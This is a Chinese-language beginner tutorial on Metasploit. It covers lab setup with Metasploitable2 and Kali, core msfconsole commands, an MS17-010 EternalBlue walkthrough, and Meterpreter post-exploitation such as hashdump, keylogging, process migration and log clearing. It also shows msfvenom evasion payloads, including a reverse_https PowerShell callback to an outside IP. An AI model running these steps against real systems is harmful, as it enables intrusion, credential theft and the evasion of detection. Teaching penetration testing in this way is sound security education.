1. 为什么选择Metasploit作为渗透测试起点第一次接触渗透测试时我被各种专业工具搞得晕头转向。直到遇到Metasploit才发现原来安全测试可以像搭积木一样简单。这个2003年由HD Moore开发的开源框架如今已经成为全球150万安全从业者的标配工具。它最吸引我的地方在于把复杂的漏洞利用过程标准化。就像乐高积木说明书告诉你哪个模块插在哪里就能实现攻击效果。实际工作中我见过太多新手卡在工具配置环节。而Metasploit自带超过2000个漏洞利用模块支持从扫描到提权的完整攻击链。去年帮某企业做内网渗透时从发现漏洞到获取域控权限全程只用了7个MSF模块。这种模块化设计让渗透测试变得可预测、可复现——这正是新手最需要的特性。2. 环境搭建10分钟搞定实验平台2.1 靶机选择为什么是Metasploitable2刚开始我尝试用Windows XP当靶机结果蓝屏了三次。后来发现Metasploitable2这个专为渗透测试设计的Ubuntu系统它预装了21个常见漏洞服务从SSH弱口令到Samba远程代码执行。最棒的是它在VirtualBox里启动只要512MB内存。下载后解压运行.vmx文件默认账号msfadmin/msfadmin。记得第一时间执行sudo passwd root # 修改root密码 sudo sed -i s/peer/trust/g /etc/postgresql/*/main/pg_hba.conf # 解决数据库认证问题2.2 Kali Linux配置技巧Kali 2023默认已经包含Metasploit但有几个坑我帮你踩过了PostgreSQL服务可能启动失败试试systemctl restart postgresql msfdb init # 初始化数据库避免频繁超时修改/usr/share/metasploit-framework/config/database.yml把pool参数调到200推荐安装增强插件apt install metasploit-framework-extra3. MSF核心操作从懵逼到熟练3.1 必须掌握的6个魔法命令第一次打开msfconsole时满屏命令让我头皮发麻。其实日常渗透只需要这几个search type:exploit name:mysql # 精准搜索漏洞 use exploit/multi/handler # 进入模块配置模式 show options # 查看必填参数 set LHOST eth0 # 自动绑定网卡IP exploit -j # 后台运行攻击 sessions -i 1 # 进入获取的shell有个冷知识setg命令可以全局保存参数。我在测试内网时总用setg RHOSTS 192.168.1.0/24后续所有模块自动继承这个目标范围。3.2 漏洞利用的黄金四步法去年培训新人时我总结了这个傻瓜流程信息收集用auxiliary/scanner/portscan/tcp扫描开放端口漏洞验证比如use auxiliary/scanner/smb/smb_ms17_010载荷选择根据场景选payload/cmd/unix/reverse或payload/windows/x64/meterpreter/reverse_tcp后渗透拿到shell后upload /root/tools/privesc.exe传提权工具关键是要看模块的Rank等级。有次客户坚持说系统绝对安全我用rankgreat的Apache漏洞三分钟拿到shell——这种高质量漏洞成功率超90%。4. 实战永恒之蓝漏洞利用全记录4.1 漏洞检测的三种姿势测试MS17-010时很多人直接上eternalblue模块。其实更稳妥的做法是use auxiliary/scanner/smb/smb_ms17_010 # 初步扫描 use exploit/windows/smb/ms17_010_psexec # 备用方案 use auxiliary/admin/smb/ms17_010_command # 执行单条命令我习惯先跑扫描模块看到VULNERABLE再深入。曾经有台服务器因为打了补丁但没重启扫描显示有漏洞实际却利用失败这时候psexec模块反而成功了。4.2 Meterpreter的高级玩法拿到基础shell只是开始meterpreter才是精髓getsystem # 自动提权 run post/windows/gather/hashdump # 获取密码哈希 keyscan_start # 记录键盘输入 screenshare # 实时监控桌面有个骚操作用migrate命令注入到explorer.exe进程这样即使会话断开也不会丢失权限。5. 避坑指南新手常犯的5个错误IP设置错误LHOST要填攻击机IP可以用ip a查看。有次我设成靶机IP死活连不上payload不匹配32位系统要用x86载荷64位用x64。可用show targets查看兼容性编码器滥用shikata_ga_nai虽好但多层编码可能触发杀软。实测3次编码最稳妥会话保持问题建议用screen -S msf启动控制台防止SSH断开导致会话丢失日志清理做完测试记得clearev否则靶机日志会留下明显痕迹记得第一次成功渗透时兴奋得忘了清理痕迹结果被客户IT部门追查了一周。现在我的工作流最后必定包含rm -rf /tmp/.malware event_manager -c6. 延伸学习从入门到精通的路径当你能熟练利用MS17-010后可以尝试这些进阶操作自己编写模块参考/usr/share/metasploit-framework/modules/exploits/下的模板结合Cobalt Strike进行协同攻击使用msfvenom生成免杀载荷关键参数-e x86/shikata_ga_nai -i 3有次遇到某企业部署了EDR标准载荷全部被拦截。最后用msfvenom -p windows/meterpreter/reverse_https LHOST1.1.1.1 -f psh-reflection生成的PowerShell脚本成功绕过。